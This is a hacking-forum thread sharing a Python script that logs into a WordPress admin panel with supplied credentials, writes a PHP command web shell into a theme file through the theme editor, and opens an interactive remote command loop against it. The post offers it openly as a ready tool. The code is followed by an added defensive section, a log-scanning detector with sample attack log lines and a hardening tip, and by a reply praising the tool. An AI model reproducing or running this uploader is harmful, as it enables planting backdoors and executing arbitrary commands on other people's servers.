Auto - Wordpress Shell Uploader Beta


ZanGetsu
« on: August 05, 2013, 12:35:38 am »
Hi, I'm dropping off this tool, which lets you upload shells to sites running WordPress.
To upload them you need the wp-admin username and password :D



Code: Python
#!/usr/bin/env python
#Install mechanize and Beautifulsoup
#easy_install mechanize,BeautifulSoup
#Give full url path to avoid issues
from BeautifulSoup import BeautifulSoup
import mechanize
from django.core.validators import URLValidator
from django.core.exceptions import Validationerror
import urllib2
import sys
import os

def check(main_url):

    val = URLValidator(verify_exists=False)
    try:
        val(main_url)
    except Validationerror, e:
        print e
    br = mechanize.Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Python-urllib/2.6'),('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
    # Give user-agent any shit u want

    check = br.open(main_url)
    html = check.read()
    soup = BeautifulSoup(html)
    search = soup.findAll('a',href="http://wordpress.org/")
    for i in search:
        if i['title'] == "Powered by WordPress":
            return(1)
        else:
            exit(1)

def wp_sucker():

    try:
        br = mechanize.Browser()
        br.set_handle_robots(False)
        print "[-] Enter the Worpress Site Login"
        main_url = raw_input()
        stat = check(main_url)
        if stat == 1:
            pass
        else:
            print "[-] Enter a Wordpress Login Page Dumbass "
            exit(0)
            sys.exit(0)
        base_url = main_url.replace('/wp-login.php','')
        br.addheaders = [('User-agent', 'Python-urllib/2.6'),('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
        br.open(main_url)
        br.select_form(nr=0)
        print "[-] Enter UserName "
        user_name = raw_input()
        print "[-] Enter Password"
        password = raw_input()
        br.form['log'] = user_name
        br.form['pwd'] = password
        br.form.find_control('redirect_to').readonly = False
        br.form['redirect_to'] = base_url+"/wp-admin/themes.php"
        page = br.submit()
        new = page.read()
        #print html
        #page = br.open(base_url+"/wp-admin/themes.php").read()
        soup = BeautifulSoup(new)
        search = soup.findAll('code')
        #print search
        #themes = ''
        print "[-] Themes Available"
        for i in search:
            print i.text

        print "[-] Select the Theme u would Like to upload the Shell"
        theme = raw_input()
        if theme == "twentyten":
            Theme = "Twenty+Ten"
        elif theme == "twentyeleven":
            Theme ="Twenty+Eleven"
        else:
            Theme = theme.title()
        url = base_url+"/wp-admin/theme-editor.php?file=/themes/%s/archive.php&theme=%s&dir=theme"%(theme,Theme)

        br.open(url)
        br.select_form(nr=1)
        br.form['newcontent'] = "<?php system($_GET['cmd']) ?>"
        br.submit()
        print "[-] Shell Has been uploaded? Would like to interact.Enter y to interact"
        answer = raw_input()
        box = base_url.split('/')[2]
        if answer == 'Y' or answer == 'y':
            while True:
                cmd = raw_input(box+"@box~")
                if cmd == "exit":
                    print "[-] Terminal Exited "
                    print "[-] Shell Uploaded @"+base_url+"/wp-content/themes/%s/archive.php?cmd="%theme
                    os._exit(0)
                    #sys.exit(0)
                else:
                    shell_url = base_url+"/wp-content/themes/%s/archive.php?cmd=%s"%(theme,cmd)
                    page = br.open(shell_url)
                    print page.read()
        else:
            print "[-] Shell has Been Uploaded Interact whenever U want"
            print "[-] Shell Uploaded @"+base_url+"/wp-content/themes/twentyten/archive.php?cmd="
            os._exit(0)
            #exit(0)
            #sys.exit(0)
    except KeyboardInterrupt:
        print"[-] trl^C Detected Shutting Down"
    else:
        print "[-] Something has gone wrong,Plse check ur Url or entered username or pass"
        print "[-] Shutting Down"
        exit()

def main():
    print "-------------------------------------------"
    print " Wordpress Shell Uploader"
    print " Credits to HR,Phaedrus \n"
    print " Login and get themes available for Upload"
    print " And Uploads a basic cmd shell"
    print "-------------------------------------------"
    wp_sucker()
    # shell_up()

main()

#EOF
#Hoping to add new shit :)

Script author: torque59,

Regards!
« Last edit: March 23, 2015, 12:43:48 pm by Expermicid »
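
A defender-side view of the traffic this script generates, as an added example that is not part of the original post: it scans web-server access logs for a save through `theme-editor.php` followed by a direct request to a theme PHP file carrying query parameters. The log lines, IP addresses and the function name `find_theme_editor_abuse` are constructed for illustration, and the Combined Log Format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<agent>[^"]*)"'
)
# Theme templates are normally included by WordPress, not requested directly.
THEME_PHP = re.compile(r'/wp-content/themes/[^/]+/.+\.php$')

# Constructed sample input (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.20 - - [05/Aug/2013:00:40:01 +0000] "GET /wp-content/themes/twentyten/style.css?ver=3.6 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Aug/2013:00:41:10 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Python-urllib/2.6"',
    '203.0.113.7 - - [05/Aug/2013:00:41:15 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "-" "Python-urllib/2.6"',
    '203.0.113.7 - - [05/Aug/2013:00:41:20 +0000] "GET /wp-content/themes/twentyten/archive.php?cmd=id HTTP/1.1" 200 64 "-" "Python-urllib/2.6"',
]

def find_theme_editor_abuse(lines):
    """Return (ip, timestamp, description, user_agent) tuples for theme-editor
    saves and for direct, parameterised requests to theme PHP files."""
    edited = set()      # client IPs already seen saving a file via the editor
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue    # skip lines that are not in the assumed format
        url = urlsplit(m['target'])
        ip, agent = m['ip'], m['agent']
        if m['method'] == 'POST' and url.path.endswith('/wp-admin/theme-editor.php'):
            edited.add(ip)
            findings.append((ip, m['ts'], 'theme file saved via editor', agent))
        elif THEME_PHP.search(url.path) and url.query:
            params = sorted(parse_qs(url.query, keep_blank_values=True))
            label = 'theme PHP hit with parameters'
            if ip in edited:
                label += ' after editor save'
            findings.append((ip, m['ts'], f'{label}: {url.path} params={params}', agent))
    return findings

if __name__ == '__main__':
    for finding in find_theme_editor_abuse(SAMPLE_LOG):
        print(finding)
```

Setting `define('DISALLOW_FILE_EDIT', true);` in `wp-config.php` disables the built-in theme and plugin editor that the script relies on.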

blackdrake
« Reply #1 on: August 08, 2013, 07:28:30 am »
Great contribution!!

Although I prefer manual upload :D

Regards! :)



 
